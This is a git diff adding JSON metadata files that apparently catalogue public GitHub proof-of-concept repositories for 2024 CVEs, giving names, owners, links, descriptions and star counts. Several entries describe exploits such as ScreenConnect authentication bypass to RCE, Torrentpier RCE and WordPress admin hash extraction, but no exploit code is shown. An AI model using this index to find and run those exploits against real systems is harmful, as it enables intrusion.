+ "full_name": "mhtsec\/cve-2024-12883",
+ "owner": {
+ "login": "mhtsec",
+ "id": 83952182,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83952182?v=4",
+ "html_url": "https:\/\/github.com\/mhtsec"
+ },
+ "html_url": "https:\/\/github.com\/mhtsec\/cve-2024-12883",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-14T21:40:40Z",
+ "updated_at": "2024-03-14T21:40:41Z",
+ "pushed_at": "2024-03-14T21:40:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1301.json b/2024/CVE-2024-1301.json
new file mode 100644
index 0000000000..723250b046
--- /dev/null
+++ b/2024/CVE-2024-1301.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 754535047,
+ "name": "CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection",
+ "full_name": "guillermogm4\/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection",
+ "owner": {
+ "login": "guillermogm4",
+ "id": 26895345,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895345?v=4",
+ "html_url": "https:\/\/github.com\/guillermogm4"
+ },
+ "html_url": "https:\/\/github.com\/guillermogm4\/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection",
+ "description": "POC Badgermeter moni tool - CVE-2024-1301",
+ "fork": false,
+ "created_at": "2024-02-08T09:08:05Z",
+ "updated_at": "2024-03-06T17:58:31Z",
+ "pushed_at": "2024-02-08T09:50:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1302.json b/2024/CVE-2024-1302.json
new file mode 100644
index 0000000000..c2eb8fc65c
--- /dev/null
+++ b/2024/CVE-2024-1302.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 754542610,
+ "name": "CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure",
+ "full_name": "guillermogm4\/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure",
+ "owner": {
+ "login": "guillermogm4",
+ "id": 26895345,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895345?v=4",
+ "html_url": "https:\/\/github.com\/guillermogm4"
+ },
+ "html_url": "https:\/\/github.com\/guillermogm4\/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure",
+ "description": "POC Badgermeter moni tool - CVE-2024-1302",
+ "fork": false,
+ "created_at": "2024-02-08T09:27:53Z",
+ "updated_at": "2024-03-06T17:58:22Z",
+ "pushed_at": "2024-02-08T09:55:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1303.json b/2024/CVE-2024-1303.json
new file mode 100644
index 0000000000..a96fe905f5
--- /dev/null
+++ b/2024/CVE-2024-1303.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 754543116,
+ "name": "CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal",
+ "full_name": "guillermogm4\/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal",
+ "owner": {
+ "login": "guillermogm4",
+ "id": 26895345,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895345?v=4",
+ "html_url": "https:\/\/github.com\/guillermogm4"
+ },
+ "html_url": "https:\/\/github.com\/guillermogm4\/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal",
+ "description": "POC Badgermeter moni tool - CVE-2024-1303",
+ "fork": false,
+ "created_at": "2024-02-08T09:29:14Z",
+ "updated_at": "2024-03-06T17:58:14Z",
+ "pushed_at": "2024-02-08T10:00:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1304.json b/2024/CVE-2024-1304.json
new file mode 100644
index 0000000000..0995fc4c6d
--- /dev/null
+++ b/2024/CVE-2024-1304.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 754543376,
+ "name": "CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS",
+ "full_name": "guillermogm4\/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS",
+ "owner": {
+ "login": "guillermogm4",
+ "id": 26895345,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895345?v=4",
+ "html_url": "https:\/\/github.com\/guillermogm4"
+ },
+ "html_url": "https:\/\/github.com\/guillermogm4\/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS",
+ "description": "POC Badgermeter moni tool - CVE-2024-1304",
+ "fork": false,
+ "created_at": "2024-02-08T09:29:54Z",
+ "updated_at": "2024-03-06T17:56:15Z",
+ "pushed_at": "2024-02-08T10:03:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1346.json b/2024/CVE-2024-1346.json
new file mode 100644
index 0000000000..b982412444
--- /dev/null
+++ b/2024/CVE-2024-1346.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 763037615,
+ "name": "CVE-2024-1346",
+ "full_name": "PeterGabaldon\/CVE-2024-1346",
+ "owner": {
+ "login": "PeterGabaldon",
+ "id": 34518201,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34518201?v=4",
+ "html_url": "https:\/\/github.com\/PeterGabaldon"
+ },
+ "html_url": "https:\/\/github.com\/PeterGabaldon\/CVE-2024-1346",
+ "description": "Weak MySQL database root password in LaborOfficeFree affects version 19.10. This vulnerability allows an attacker to calculate the root password of the MySQL database used by LaborOfficeFree using two constants.",
+ "fork": false,
+ "created_at": "2024-02-25T11:51:03Z",
+ "updated_at": "2024-03-19T03:13:08Z",
+ "pushed_at": "2024-02-25T11:55:20Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1403.json b/2024/CVE-2024-1403.json
new file mode 100644
index 0000000000..8b4c171dfe
--- /dev/null
+++ b/2024/CVE-2024-1403.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 768162174,
+ "name": "CVE-2024-1403",
+ "full_name": "horizon3ai\/CVE-2024-1403",
+ "owner": {
+ "login": "horizon3ai",
+ "id": 79593994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4",
+ "html_url": "https:\/\/github.com\/horizon3ai"
+ },
+ "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-1403",
+ "description": "Progress OpenEdge Authentication Bypass",
+ "fork": false,
+ "created_at": "2024-03-06T15:27:18Z",
+ "updated_at": "2024-06-05T16:33:53Z",
+ "pushed_at": "2024-03-06T15:31:56Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1441.json b/2024/CVE-2024-1441.json
new file mode 100644
index 0000000000..c9cd34022d
--- /dev/null
+++ b/2024/CVE-2024-1441.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 787252981,
+ "name": "CVE-2024-1441",
+ "full_name": "almkuznetsov\/CVE-2024-1441",
+ "owner": {
+ "login": "almkuznetsov",
+ "id": 96069812,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96069812?v=4",
+ "html_url": "https:\/\/github.com\/almkuznetsov"
+ },
+ "html_url": "https:\/\/github.com\/almkuznetsov\/CVE-2024-1441",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-16T07:14:33Z",
+ "updated_at": "2024-04-25T09:15:04Z",
+ "pushed_at": "2024-04-25T09:15:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1512.json b/2024/CVE-2024-1512.json
new file mode 100644
index 0000000000..6f32855eb2
--- /dev/null
+++ b/2024/CVE-2024-1512.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 765658440,
+ "name": "CVE-2024-1512",
+ "full_name": "rat-c\/CVE-2024-1512",
+ "owner": {
+ "login": "rat-c",
+ "id": 89196953,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89196953?v=4",
+ "html_url": "https:\/\/github.com\/rat-c"
+ },
+ "html_url": "https:\/\/github.com\/rat-c\/CVE-2024-1512",
+ "description": "PoC for CVE-2024-1512 in MasterStudy LMS WordPress Plugin.",
+ "fork": false,
+ "created_at": "2024-03-01T11:08:37Z",
+ "updated_at": "2024-04-02T03:27:23Z",
+ "pushed_at": "2024-03-01T11:18:20Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1561.json b/2024/CVE-2024-1561.json
new file mode 100644
index 0000000000..9bebc564c1
--- /dev/null
+++ b/2024/CVE-2024-1561.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 799218200,
+ "name": "CVE-2024-1561",
+ "full_name": "DiabloHTB\/CVE-2024-1561",
+ "owner": {
+ "login": "DiabloHTB",
+ "id": 124635368,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124635368?v=4",
+ "html_url": "https:\/\/github.com\/DiabloHTB"
+ },
+ "html_url": "https:\/\/github.com\/DiabloHTB\/CVE-2024-1561",
+ "description": "Poc for CVE-2024-1561 affecting Gradio 4.12.0",
+ "fork": false,
+ "created_at": "2024-05-11T13:44:46Z",
+ "updated_at": "2024-05-11T14:24:34Z",
+ "pushed_at": "2024-05-11T13:58:05Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 799663993,
+ "name": "Nuclei-Template-CVE-2024-1561",
+ "full_name": "DiabloHTB\/Nuclei-Template-CVE-2024-1561",
+ "owner": {
+ "login": "DiabloHTB",
+ "id": 124635368,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124635368?v=4",
+ "html_url": "https:\/\/github.com\/DiabloHTB"
+ },
+ "html_url": "https:\/\/github.com\/DiabloHTB\/Nuclei-Template-CVE-2024-1561",
+ "description": "Nuclei Templates ",
+ "fork": false,
+ "created_at": "2024-05-12T19:55:53Z",
+ "updated_at": "2024-05-12T20:24:09Z",
+ "pushed_at": "2024-05-12T20:17:16Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1642470.json b/2024/CVE-2024-1642470.json
new file mode 100644
index 0000000000..861b558242
--- /dev/null
+++ b/2024/CVE-2024-1642470.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 787003431,
+ "name": "CVE-2024-1642470",
+ "full_name": "Symbolexe\/CVE-2024-1642470",
+ "owner": {
+ "login": "Symbolexe",
+ "id": 140549630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140549630?v=4",
+ "html_url": "https:\/\/github.com\/Symbolexe"
+ },
+ "html_url": "https:\/\/github.com\/Symbolexe\/CVE-2024-1642470",
+ "description": "CVE-2024-1642470 is a critical vulnerability discovered in the Windows USB Generic Parent Driver. The vulnerability arises due to improper input validation within the driver's IOCTL handling mechanism. As a result, remote attackers can execute arbitrary code via crafted IOCTL requests, potentially leading to system compromise.",
+ "fork": false,
+ "created_at": "2024-04-15T17:51:59Z",
+ "updated_at": "2024-06-05T16:10:03Z",
+ "pushed_at": "2024-04-15T17:54:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1651.json b/2024/CVE-2024-1651.json
new file mode 100644
index 0000000000..2e14e16aac
--- /dev/null
+++ b/2024/CVE-2024-1651.json
@@ -0,0 +1,96 @@
+[
+ {
+ "id": 762235697,
+ "name": "CVE-2024-1651-PoC",
+ "full_name": "sharpicx\/CVE-2024-1651-PoC",
+ "owner": {
+ "login": "sharpicx",
+ "id": 44630640,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44630640?v=4",
+ "html_url": "https:\/\/github.com\/sharpicx"
+ },
+ "html_url": "https:\/\/github.com\/sharpicx\/CVE-2024-1651-PoC",
+ "description": "Torrentpier v2.4.1. CVE-2024-1651. Remote Code Execution (RCE). Exploit.",
+ "fork": false,
+ "created_at": "2024-02-23T11:04:24Z",
+ "updated_at": "2024-05-03T10:19:20Z",
+ "pushed_at": "2024-03-07T10:23:52Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "rce",
+ "security",
+ "torrentpier"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 765380419,
+ "name": "CVE-2024-1651-exploit-RCE",
+ "full_name": "hy011121\/CVE-2024-1651-exploit-RCE",
+ "owner": {
+ "login": "hy011121",
+ "id": 75035965,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75035965?v=4",
+ "html_url": "https:\/\/github.com\/hy011121"
+ },
+ "html_url": "https:\/\/github.com\/hy011121\/CVE-2024-1651-exploit-RCE",
+ "description": "(Mirorring)",
+ "fork": false,
+ "created_at": "2024-02-29T20:06:30Z",
+ "updated_at": "2024-05-31T16:53:29Z",
+ "pushed_at": "2024-02-29T21:09:19Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 789059612,
+ "name": "CVE-2024-1651-PoC",
+ "full_name": "Whiteh4tWolf\/CVE-2024-1651-PoC",
+ "owner": {
+ "login": "Whiteh4tWolf",
+ "id": 53398803,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53398803?v=4",
+ "html_url": "https:\/\/github.com\/Whiteh4tWolf"
+ },
+ "html_url": "https:\/\/github.com\/Whiteh4tWolf\/CVE-2024-1651-PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-19T16:18:59Z",
+ "updated_at": "2024-04-19T16:20:44Z",
+ "pushed_at": "2024-04-19T16:20:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1655.json b/2024/CVE-2024-1655.json
new file mode 100644
index 0000000000..c49d096714
--- /dev/null
+++ b/2024/CVE-2024-1655.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 796642361,
+ "name": "CVE-2024-1655",
+ "full_name": "lnversed\/CVE-2024-1655",
+ "owner": {
+ "login": "lnversed",
+ "id": 46649884,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46649884?v=4",
+ "html_url": "https:\/\/github.com\/lnversed"
+ },
+ "html_url": "https:\/\/github.com\/lnversed\/CVE-2024-1655",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-06T10:56:47Z",
+ "updated_at": "2024-05-06T10:57:22Z",
+ "pushed_at": "2024-05-06T10:57:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1698.json b/2024/CVE-2024-1698.json
new file mode 100644
index 0000000000..cba0dba0aa
--- /dev/null
+++ b/2024/CVE-2024-1698.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 779111890,
+ "name": "CVE-2024-1698-Exploit",
+ "full_name": "kamranhasan\/CVE-2024-1698-Exploit",
+ "owner": {
+ "login": "kamranhasan",
+ "id": 53407467,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53407467?v=4",
+ "html_url": "https:\/\/github.com\/kamranhasan"
+ },
+ "html_url": "https:\/\/github.com\/kamranhasan\/CVE-2024-1698-Exploit",
+ "description": "This is an exploit script to find out wordpress admin's username and password hash by exploiting CVE-2024-1698.",
+ "fork": false,
+ "created_at": "2024-03-29T04:11:06Z",
+ "updated_at": "2024-05-21T22:36:39Z",
+ "pushed_at": "2024-03-29T04:31:31Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1709.json b/2024/CVE-2024-1709.json
new file mode 100644
index 0000000000..ec569922f5
--- /dev/null
+++ b/2024/CVE-2024-1709.json
@@ -0,0 +1,131 @@
+[
+ {
+ "id": 761127845,
+ "name": "ScreenConnect-AuthBypass-RCE",
+ "full_name": "W01fh4cker\/ScreenConnect-AuthBypass-RCE",
+ "owner": {
+ "login": "W01fh4cker",
+ "id": 101872898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4",
+ "html_url": "https:\/\/github.com\/W01fh4cker"
+ },
+ "html_url": "https:\/\/github.com\/W01fh4cker\/ScreenConnect-AuthBypass-RCE",
+ "description": "ScreenConnect AuthBypass(cve-2024-1709) --> RCE!!!",
+ "fork": false,
+ "created_at": "2024-02-21T09:42:04Z",
+ "updated_at": "2024-06-21T03:37:47Z",
+ "pushed_at": "2024-02-22T05:22:35Z",
+ "stargazers_count": 91,
+ "watchers_count": 91,
+ "has_discussions": false,
+ "forks_count": 27,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "attack",
+ "auth",
+ "bypass",
+ "connectwise",
+ "cve-2024-1708",
+ "cve-2024-1709",
+ "redteam",
+ "screenconnect"
+ ],
+ "visibility": "public",
+ "forks": 27,
+ "watchers": 91,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 762393021,
+ "name": "CVE-2024-1709",
+ "full_name": "HussainFathy\/CVE-2024-1709",
+ "owner": {
+ "login": "HussainFathy",
+ "id": 76268960,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76268960?v=4",
+ "html_url": "https:\/\/github.com\/HussainFathy"
+ },
+ "html_url": "https:\/\/github.com\/HussainFathy\/CVE-2024-1709",
+ "description": "A Scanner for CVE-2024-1709 - ConnectWise SecureConnect Authentication Bypass Vulnerability",
+ "fork": false,
+ "created_at": "2024-02-23T17:26:28Z",
+ "updated_at": "2024-04-02T03:28:07Z",
+ "pushed_at": "2024-02-26T12:00:23Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 776185551,
+ "name": "CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass",
+ "full_name": "sxyrxyy\/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass",
+ "owner": {
+ "login": "sxyrxyy",
+ "id": 125439203,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125439203?v=4",
+ "html_url": "https:\/\/github.com\/sxyrxyy"
+ },
+ "html_url": "https:\/\/github.com\/sxyrxyy\/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-22T21:20:19Z",
+ "updated_at": "2024-03-22T21:20:44Z",
+ "pushed_at": "2024-03-22T21:32:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780750161,
+ "name": "CVE-2024-1709-and-CVE-2024-1708",
+ "full_name": "cjybao\/CVE-2024-1709-and-CVE-2024-1708",
+ "owner": {
+ "login": "cjybao",
+ "id": 61445855,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61445855?v=4",
+ "html_url": "https:\/\/github.com\/cjybao"
+ },
+ "html_url": "https:\/\/github.com\/cjybao\/CVE-2024-1709-and-CVE-2024-1708",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-02T04:58:38Z",
+ "updated_at": "2024-04-03T03:43:48Z",
+ "pushed_at": "2024-04-02T07:58:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1781.json b/2024/CVE-2024-1781.json
new file mode 100644
index 0000000000..5b2236e6a7
--- /dev/null
+++ b/2024/CVE-2024-1781.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 756338567,
+ "name": "CVE-2024-1781",
+ "full_name": "Icycu123\/CVE-2024-1781",
+ "owner": {
+ "login": "Icycu123",
+ "id": 89123126,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89123126?v=4",
+ "html_url": "https:\/\/github.com\/Icycu123"
+ },
+ "html_url": "https:\/\/github.com\/Icycu123\/CVE-2024-1781",
+ "description": "CVE-2024-1781",
+ "fork": false,
+ "created_at": "2024-02-12T13:26:03Z",
+ "updated_at": "2024-03-14T12:34:11Z",
+ "pushed_at": "2024-02-12T13:54:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-1874.json b/2024/CVE-2024-1874.json
new file mode 100644
index 0000000000..ca246538fa
--- /dev/null
+++ b/2024/CVE-2024-1874.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 787746052,
+ "name": "-CVE-2024-1874-",
+ "full_name": "ox1111\/-CVE-2024-1874-",
+ "owner": {
+ "login": "ox1111",
+ "id": 31942498,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31942498?v=4",
+ "html_url": "https:\/\/github.com\/ox1111"
+ },
+ "html_url": "https:\/\/github.com\/ox1111\/-CVE-2024-1874-",
+ "description": "command injection",
+ "fork": false,
+ "created_at": "2024-04-17T05:26:34Z",
+ "updated_at": "2024-04-17T05:26:34Z",
+ "pushed_at": "2024-04-17T05:26:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-20291.json b/2024/CVE-2024-20291.json
new file mode 100644
index 0000000000..129fbe2e40
--- /dev/null
+++ b/2024/CVE-2024-20291.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 766433376,
+ "name": "CVE-2024-20291-POC",
+ "full_name": "Instructor-Team8\/CVE-2024-20291-POC",
+ "owner": {
+ "login": "Instructor-Team8",
+ "id": 61094918,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61094918?v=4",
+ "html_url": "https:\/\/github.com\/Instructor-Team8"
+ },
+ "html_url": "https:\/\/github.com\/Instructor-Team8\/CVE-2024-20291-POC",
+ "description": "CVE-2024-20291-POC exploit ---> RCE",
+ "fork": false,
+ "created_at": "2024-03-03T08:53:14Z",
+ "updated_at": "2024-04-26T15:34:10Z",
+ "pushed_at": "2024-03-09T18:14:57Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-20338.json b/2024/CVE-2024-20338.json
new file mode 100644
index 0000000000..afb720ed99
--- /dev/null
+++ b/2024/CVE-2024-20338.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 813167804,
+ "name": "CVE-2024-20338",
+ "full_name": "annmuor\/CVE-2024-20338",
+ "owner": {
+ "login": "annmuor",
+ "id": 1037402,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1037402?v=4",
+ "html_url": "https:\/\/github.com\/annmuor"
+ },
+ "html_url": "https:\/\/github.com\/annmuor\/CVE-2024-20338",
+ "description": "CVE-2024-20338 talk for Behind The Code Talk",
+ "fork": false,
+ "created_at": "2024-06-10T15:41:41Z",
+ "updated_at": "2024-06-20T16:27:44Z",
+ "pushed_at": "2024-06-10T20:13:25Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-20356.json b/2024/CVE-2024-20356.json
new file mode 100644
index 0000000000..5e0598da98
--- /dev/null
+++ b/2024/CVE-2024-20356.json
@@ -0,0 +1,66 @@
+[
+ {
+ "id": 785760205,
+ "name": "CVE-2024-20356",
+ "full_name": "nettitude\/CVE-2024-20356",
+ "owner": {
+ "login": "nettitude",
+ "id": 11998401,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11998401?v=4",
+ "html_url": "https:\/\/github.com\/nettitude"
+ },
+ "html_url": "https:\/\/github.com\/nettitude\/CVE-2024-20356",
